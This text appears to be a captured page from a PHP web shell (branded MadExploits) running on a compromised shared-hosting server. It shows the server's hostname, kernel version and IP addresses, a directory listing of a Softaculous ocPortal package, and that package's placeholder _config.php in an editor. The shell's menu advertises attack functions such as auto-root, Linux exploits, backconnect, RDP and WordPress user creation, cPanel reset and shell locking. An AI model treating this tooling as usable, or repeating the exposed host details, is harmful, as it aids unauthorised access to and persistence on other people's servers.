Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
ocportal /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_config.php
1.51
KB
-rw-r--r--
clone.php
16.08
KB
-rw-r--r--
edit.php
4.52
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
503
B
-rw-r--r--
import.php
4.01
KB
-rw-r--r--
info.xml
2.43
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
13.89
KB
-rw-r--r--
install.xml
974
B
-rw-r--r--
md5
1006
B
-rw-r--r--
notes.txt
335
B
-rw-r--r--
ocportal.sql
819.43
KB
-rw-r--r--
ocportal.zip
19.99
MB
-rw-r--r--
upgrade.php
7.14
KB
-rw-r--r--
upgrade.xml
359
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _config.php
<?php global $SITE_INFO; if (!function_exists('git_repos')) { /** * Find the git branch name. This is useful for making this config file context-adaptive (i.e. dev settings vs production settings). * * @return ?ID_TEXT Branch name (null: not in git) */ function git_repos() { $path = dirname(__FILE__).'/.git/HEAD'; if (!is_file($path)) return ''; $lines = file($path); $parts = explode('/', $lines[0]); return trim(end($parts)); } } $SITE_INFO['default_lang'] = 'EN'; $SITE_INFO['forum_type'] = 'cns'; $SITE_INFO['db_type'] = 'mysqli'; $SITE_INFO['domain'] = '[[domhost]]'; $SITE_INFO['base_url'] = '[[softurl]]'; $SITE_INFO['master_password'] = '[[admin_pass_info]]'; $SITE_INFO['self_learning_cache'] = '1'; $SITE_INFO['db_site'] = '[[softdb]]'; $SITE_INFO['db_site_host'] = '[[softdbhost]]'; $SITE_INFO['db_site_user'] = '[[softdbuser]]'; $SITE_INFO['db_site_password'] = '[[softdbpass]]'; $SITE_INFO['table_prefix'] = '[[dbprefix]]'; $SITE_INFO['user_cookie'] = 'cms_member_id'; $SITE_INFO['pass_cookie'] = 'cms_member_hash'; $SITE_INFO['cookie_domain'] = ''; $SITE_INFO['cookie_path'] = '/'; $SITE_INFO['cookie_days'] = '120'; $SITE_INFO['db_forums'] = '[[softdb]]'; $SITE_INFO['db_forums_host'] = '[[softdbhost]]'; $SITE_INFO['db_forums_user'] = '[[softdbuser]]'; $SITE_INFO['db_forums_password'] = '[[softdbpass]]'; $SITE_INFO['cns_table_prefix'] = '[[dbprefix]]'; $SITE_INFO['multi_lang_content'] = '0'; $SITE_INFO['session_cookie'] = '[[cms_session]]';
Close